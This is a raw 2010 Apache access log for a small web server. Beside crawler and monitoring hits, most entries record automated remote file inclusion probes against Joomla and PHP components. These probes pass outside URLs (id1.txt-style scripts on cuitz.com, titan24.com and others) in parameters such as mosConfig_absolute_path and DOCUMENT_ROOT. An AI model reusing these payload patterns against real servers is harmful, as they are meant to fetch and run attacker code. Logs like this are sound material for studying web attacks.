66.249.67.27 - - [16/Apr/2010:00:21:19 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1274055F8AF5A700818203E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
209.59.12.99 - - [16/Apr/2010:00:21:55 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.78.238.157 - - [16/Apr/2010:00:22:27 -0400] "GET /logs/access_log.Q109103100//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:22:30 -0400] "GET /logs/error_log.Q110013000//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:22:33 -0400] "GET /logs/access_log.Q109103100//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:22:50 -0400] "GET ////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:22:50 -0400] "GET /logs////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:22:50 -0400] "GET /logs/error_log.Q109071800%20%20////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:22:50 -0400] "GET /logs/error_log.Q109090900%20%20////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
222.236.47.182 - - [16/Apr/2010:00:23:03 -0400] "GET /logs/access_log.Q109081500%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:23:08 -0400] "GET /logs////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:23:08 -0400] "GET ////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:23:08 -0400] "GET /logs/error_log.Q109071800%20%20////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:23:08 -0400] "GET /logs/error_log.Q109090900%20%20////e404.php?DOCUMENT_ROOT=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.228.111.218 - - [16/Apr/2010:00:23:10 -0400] "GET /logs/access_log.Q110031200//index.php?DOCUMENT_ROOT=http://www.protectivecoatingsplus.com/images/htacess1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.228.111.218 - - [16/Apr/2010:00:23:10 -0400] "GET //index.php?DOCUMENT_ROOT=http://www.protectivecoatingsplus.com/images/htacess1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
67.228.111.218 - - [16/Apr/2010:00:23:10 -0400] "GET /logs//index.php?DOCUMENT_ROOT=http://www.protectivecoatingsplus.com/images/htacess1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:00:23:10 -0400] "GET /images/_notes/download_tut_2stg_sm.jpg.mno HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
222.236.47.182 - - [16/Apr/2010:00:23:12 -0400] "GET /logs/access_log.Q109081500%20%20//components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://takesi.freewebhostx.com/fx29id1.txt??? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:00:23:02 -0400] "GET /logs/error_log.Q109091600 HTTP/1.0" 200 2846799 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
79.98.23.9 - - [16/Apr/2010:00:23:22 -0400] "GET /logs/access_log.Q109061500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:23:24 -0400] "GET /logs/error_log.Q109092600%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:23:25 -0400] "GET /logs/access_log.Q109060900%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
79.98.23.9 - - [16/Apr/2010:00:23:27 -0400] "GET /logs/error_log.Q109061500%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.howtolisten.kr/lct/exam3/111/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:46 -0400] "GET ////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:46 -0400] "GET /logs/error_log.Q109071800%20%20////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:46 -0400] "GET /logs////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
123.125.66.121 - - [16/Apr/2010:00:23:48 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
212.59.2.84 - - [16/Apr/2010:00:23:49 -0400] "GET /logs/error_log.Q109071800%20%20////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:49 -0400] "GET ////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:49 -0400] "GET /logs////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:57 -0400] "GET /logs/error_log.Q109090900%20%20////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:23:57 -0400] "GET /logs/error_log.Q109090900%20%20////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:24:03 -0400] "GET /logs/error_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:11 -0400] "GET /logs////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:11 -0400] "GET /logs/access_log.Q109112300////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:12 -0400] "GET ////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
220.181.7.76 - - [16/Apr/2010:00:24:22 -0400] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
67.222.152.66 - - [16/Apr/2010:00:24:23 -0400] "GET /logs/access_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:27 -0400] "GET /logs/error_log.Q109050800////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:43 -0400] "GET ////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:43 -0400] "GET /logs/access_log.Q109112300////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:43 -0400] "GET /logs////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:24:49 -0400] "GET /logs/error_log.Q109050800////e404.php?DOCUMENT_ROOT=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:24:55 -0400] "GET /logs/error_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.222.152.66 - - [16/Apr/2010:00:24:55 -0400] "GET /logs/access_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:27 -0400] "GET /errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:27 -0400] "GET /logs/errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:27 -0400] "GET /logs/access_log.Q109101400%20%20/errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:27 -0400] "GET /logs/access_log.Q110012000%20%20/errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:28 -0400] "GET /errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:28 -0400] "GET /logs/errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:28 -0400] "GET /logs/access_log.Q109101400%20%20/errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
210.192.102.17 - - [16/Apr/2010:00:25:28 -0400] "GET /logs/access_log.Q110012000%20%20/errors.php?error=http://shop.titan24.com/admin/id1.txt???? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:37 -0400] "GET /logs/access_log.Q109101400%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:37 -0400] "GET /logs/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:37 -0400] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:41 -0400] "GET /errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:41 -0400] "GET /logs/access_log.Q109101400%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:41 -0400] "GET /logs/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:44 -0400] "GET /logs/access_log.Q110012000%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
212.59.2.84 - - [16/Apr/2010:00:25:44 -0400] "GET /logs/access_log.Q110012000%20%20/errors.php?error=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
66.249.67.232 - - [16/Apr/2010:00:26:59 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1274055F8AC587008D8203E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
174.133.122.210 - - [16/Apr/2010:00:27:14 -0400] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:27:14 -0400] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:27:14 -0400] "GET /logs/access_log.Q109072400%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:27:15 -0400] "GET //components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:27:15 -0400] "GET /logs//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:27:15 -0400] "GET /logs/access_log.Q109072400%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:00:28:06 -0400] "GET /logs/error_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.195.114.252 - - [16/Apr/2010:00:27:37 -0400] "GET /logs/access_log.Q109110200 HTTP/1.0" 200 5338894 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
61.84.68.4 - - [16/Apr/2010:00:28:07 -0400] "GET //administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:28:07 -0400] "GET /logs/access_log.Q109051100//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:28:07 -0400] "GET /logs//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:00:28:20 -0400] "GET /logs/error_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:00:28:36 -0400] "GET /logs/access_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:40 -0400] "GET /index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:40 -0400] "GET /logs/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:41 -0400] "GET /logs/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:41 -0400] "GET /logs/access_log.Q109091200/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:41 -0400] "GET /index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:41 -0400] "GET /logs/access_log.Q109091200/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:49 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:49 -0400] "GET /logs/access_log.Q109070300%20%20//components/com_jcalpro/cal_popup.php?mosConfig_absolute_path=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
217.23.8.91 - - [16/Apr/2010:00:28:50 -0400] "GET /logs/access_log.Q109121100%20%20/admin/functions/PhpCommander/upload.php?Directory=./&sort=NomASC&action=http://phamsight.com/docs/images/head?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:28:51 -0400] "GET /logs/access_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:51 -0400] "GET /logs/access_log.Q109091200%20%20/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:51 -0400] "GET /index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:51 -0400] "GET /logs/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:28:51 -0400] "GET /logs/error_log.Q109051100%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:51 -0400] "GET /logs/access_log.Q109091200%20%20/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:51 -0400] "GET /logs/index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:28:51 -0400] "GET /index2.php?prefix=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:29:08 -0400] "GET /logs/access_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:00:29:29 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
209.59.12.99 - - [16/Apr/2010:00:29:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
189.155.145.179 - - [16/Apr/2010:00:30:00 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:30:00 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
61.84.68.4 - - [16/Apr/2010:00:30:01 -0400] "GET /logs/access_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:30:01 -0400] "GET /logs/error_log.Q109083000%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:30:01 -0400] "GET /logs/error_log.Q109112300%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:30:01 -0400] "GET /logs/access_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
211.62.35.55 - - [16/Apr/2010:00:30:02 -0400] "GET /logs/access_log.Q109051900%20%20/?sourcedir=http://lemoland.ru/forum/images/id1.txt????? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:30:06 -0400] "GET /logs/error_log.Q109070700%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
189.155.145.179 - - [16/Apr/2010:00:30:16 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:30:16 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
61.84.68.4 - - [16/Apr/2010:00:30:17 -0400] "GET /logs/error_log.Q110020800%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
189.155.145.179 - - [16/Apr/2010:00:30:18 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
189.155.145.179 - - [16/Apr/2010:00:30:18 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/home.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; GTB6.4; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
174.133.122.210 - - [16/Apr/2010:00:30:18 -0400] "GET //include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
174.133.122.210 - - [16/Apr/2010:00:30:18 -0400] "GET /logs//include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.kosba.or.kr/data/common/kobams.com/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:30:24 -0400] "GET /logs/error_log.Q109080200%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
61.84.68.4 - - [16/Apr/2010:00:30:31 -0400] "GET /logs/access_log.Q109082500%20%20//administrator/components/com_babackup/classes/Tar.php?mosConfig.absolute.path=http://www.abi.co.uk/id1.txt? HTTP/1.1" 404 281 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:13 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:13 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:13 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:25 -0400] "GET /logs/access_log.Q110031400//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:25 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:25 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:26 -0400] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:26 -0400] "GET /logs/access_log.Q110031400%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:26 -0400] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:31 -0400] "GET /logs/access_log.Q110011500%20%20//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
200.78.238.157 - - [16/Apr/2010:00:31:33 -0400] "GET /logs/access_log.Q110011500//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://cuitz.com/id/id1.txt????? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
